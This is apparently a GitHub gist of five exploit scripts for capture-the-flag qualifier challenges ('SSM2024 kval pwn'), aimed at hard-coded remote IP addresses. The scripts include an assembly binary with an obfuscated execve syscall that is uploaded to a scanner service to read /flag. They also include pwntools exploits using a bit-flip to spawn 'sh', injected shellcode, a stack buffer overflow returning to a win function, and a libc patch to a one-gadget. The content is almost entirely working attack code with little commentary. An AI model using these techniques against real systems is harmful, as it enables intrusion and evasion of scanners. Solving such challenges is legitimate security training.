Created
March 9, 2024 20:07
-
-
Save TheBlupper/6e9b24f6baabaf7f9b696912a6d898f6 to your computer and use it in GitHub Desktop.
SSM2024 kval pwn
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
import requests | |
open('sploit.S', 'w').write(''' | |
global _start | |
section .text | |
_start: | |
mov rax, 59 ; execve | |
mov rdi, fn | |
mov rsi, argv | |
mov rdx, 0 | |
; obfuscate syscall | |
xor QWORD [$+12], 0x40e | |
db 0x1, 0x1 | |
section .data | |
fn: db "/bin/bash", 0 | |
a1: db "-c", 0 | |
a2: db "cat /flag", 0 | |
argv: dq fn, a1, a2, 0''') | |
os.system('nasm -f elf64 sploit.S -o sploit.o') | |
# --omagic makes .text writable | |
os.system('ld sploit.o --omagic -o sploit') | |
# fix ABI, Elf64_Ident.os | |
with open('sploit', 'r+b') as f: | |
f.seek(7) | |
f.write(b'\x03') | |
resp = requests.post('http://46.246.109.16:50000/scan', files={'file': open('./sploit', 'rb')}) | |
print(resp.text) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
io = remote('46.246.30.233', 50000) | |
def flip(off): | |
io.sendlineafter(b'flip: ', str(off).encode()) | |
src = b'echo Thank you for making my hummus mummus again!' | |
tgt = b'sh\0' | |
for i, (a, b) in enumerate(zip(src, tgt)): | |
[flip(8*(96+i)+j) for j in range(8) if (a^b) & (1 << j)] | |
flip(8*16) | |
io.sendline(b'cat flag.txt') | |
io.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
context.binary = './challenge' | |
io = remote('46.246.109.134', 50000) | |
# at least one item in the db so that it runs | |
# an iteration of our shellcode | |
io.sendlineafter(b'Option: ', b'1') | |
io.sendlineafter(b'type: ', b'1') | |
io.sendlineafter(b'size: ', b'1') | |
io.sendlineafter(b'Data:', b'1') | |
io.sendlineafter(b'Option: ', b'3') | |
sc = asm(shellcraft.amd64.linux.sh()) | |
io.sendlineafter(b'size: ', str(len(sc)).encode()) | |
io.sendlineafter(b'Query: ', sc) | |
io.sendline('cat flag.txt') | |
io.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
context.binary = exe = ELF('./Stack Buffer Overflow 101') | |
io = remote('46.246.39.26', 50000) | |
io.recvuntil(b'win(): ') | |
exe.address = int(io.recvline().strip(), 0) - exe.sym.win | |
io.sendline(b'a'*0x28 + p64(exe.sym.set_command) + p64(exe.sym.win)) | |
io.clean() | |
io.sendline(b'cat flag.txt') | |
io.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import base64 | |
from pwn import * | |
io = remote('46.246.30.193', 50000) | |
io.recvuntil(b'libc:') | |
raw = bytearray(base64.b64decode(io.recvline())) | |
# set entry to one-gadget | |
raw[0x18:0x18+8] = p64(0x4f2a5) | |
io.sendlineafter(b'(base64): ', base64.b64encode(raw)) | |
io.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment